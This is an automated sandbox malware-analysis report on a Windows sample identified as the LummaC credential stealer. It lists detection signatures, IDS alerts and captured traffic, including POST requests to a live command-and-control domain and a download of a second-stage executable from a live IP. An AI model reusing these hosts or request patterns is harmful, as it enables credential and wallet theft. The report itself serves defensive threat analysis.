Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Script.exe

Overview

General Information

Sample name:Script.exe
Analysis ID:1561303
MD5:e9c36f6a03694c88081409d38d76b9e8
SHA1:59356b5d0918fd2c402ebfff702846100d02a7f1
SHA256:980a90b7a738a090f4775800a3de183f2e9d94ce54f882e443c2d01105badb4d
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Script.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\Script.exe" MD5: E9C36F6A03694C88081409D38D76B9E8)
    • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 4616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2214373366.0000000002EA6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 6 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T03:11:08.080599+010020283713Unknown Traffic192.168.2.549704104.21.33.116443TCP
              2024-11-23T03:11:10.417761+010020283713Unknown Traffic192.168.2.549706104.21.33.116443TCP
              2024-11-23T03:11:12.715388+010020283713Unknown Traffic192.168.2.549708104.21.33.116443TCP
              2024-11-23T03:11:14.940552+010020283713Unknown Traffic192.168.2.549712104.21.33.116443TCP
              2024-11-23T03:11:17.297654+010020283713Unknown Traffic192.168.2.549714104.21.33.116443TCP
              2024-11-23T03:11:19.787711+010020283713Unknown Traffic192.168.2.549717104.21.33.116443TCP
              2024-11-23T03:11:22.208787+010020283713Unknown Traffic192.168.2.549718104.21.33.116443TCP
              2024-11-23T03:11:26.257251+010020283713Unknown Traffic192.168.2.549732104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T03:11:08.987788+010020546531A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
              2024-11-23T03:11:11.170907+010020546531A Network Trojan was detected192.168.2.549706104.21.33.116443TCP
              2024-11-23T03:11:26.990618+010020546531A Network Trojan was detected192.168.2.549732104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T03:11:08.987788+010020498361A Network Trojan was detected192.168.2.549704104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T03:11:11.170907+010020498121A Network Trojan was detected192.168.2.549706104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T03:11:20.533321+010020480941Malware Command and Control Activity Detected192.168.2.549717104.21.33.116443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://147.45.47.81/Virustotal: Detection: 17%Perma Link
              Source: Script.exeVirustotal: Detection: 29%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
              Source: Script.exeJoe Sandbox ML: detected
              Source: Script.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49732 version: TLS 1.2
              Source: Script.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WERA0F2.tmp.dmp.6.dr
              Source: Binary string: mscorlib.ni.pdb source: WERA0F2.tmp.dmp.6.dr
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: Script.exe, 00000000.00000002.2391418600.0000000000BEA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERA0F2.tmp.dmp.6.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbt source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Desktop\Script.PDB source: Script.exe, 00000000.00000002.2391418600.0000000000BEA000.00000004.00000010.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C4872 FindFirstFileExW,0_2_6E0C4872
              Source: C:\Users\user\Desktop\Script.exeCode function: 4x nop then movzx esi, word ptr [ecx]0_2_009DA6B0
              Source: C:\Users\user\Desktop\Script.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax+30h]0_2_009E26B0
              Source: C:\Users\user\Desktop\Script.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009E26B0
              Source: C:\Users\user\Desktop\Script.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1CE638E1h0_2_00A02E50
              Source: C:\Users\user\Desktop\Script.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+08h]0_2_009CB660
              Source: C:\Users\user\Desktop\Script.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_009E3060
              Source: C:\Users\user\Desktop\Script.exeCode function: 4x nop then push eax0_2_009CD990

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49717 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49732 -> 104.21.33.116:443
              Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
              Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49732 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.33.116:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N23RGOI0DWZUJ3QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12822Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XQLF3A2WQH5WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15046Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4WRWF5HSM9KRBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20542Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GDLAT1QLDBQUDJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1239Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C5R9OIAZWHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569082Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
              Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/
              Source: aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
              Source: aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exeR
              Source: aspnet_regiis.exe, 00000003.00000002.2525039530.0000000002EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exet
              Source: aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/v
              Source: aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81:80/conhost.exeicrosoft
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: aspnet_regiis.exe, 00000003.00000003.2278969823.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microh
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2524937110.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143157759.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
              Source: aspnet_regiis.exe, 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/$
              Source: aspnet_regiis.exe, 00000003.00000003.2164739586.00000000051BE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164630592.00000000051B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164351137.00000000051B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/(
              Source: aspnet_regiis.exe, 00000003.00000002.2524937110.0000000002E81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/R
              Source: aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/Z
              Source: aspnet_regiis.exe, 00000003.00000003.2214338243.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2279021640.00000000051D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
              Source: aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api;I
              Source: aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiN
              Source: aspnet_regiis.exe, 00000003.00000003.2252014610.00000000051D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523832590.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2525465526.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235406120.00000000051D5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2279021640.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiZuV
              Source: aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apic
              Source: aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/b
              Source: aspnet_regiis.exe, 00000003.00000003.2251568762.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2252261385.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235233881.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235371345.0000000002EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/pi
              Source: aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
              Source: aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiK
              Source: aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiicrosoft
              Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
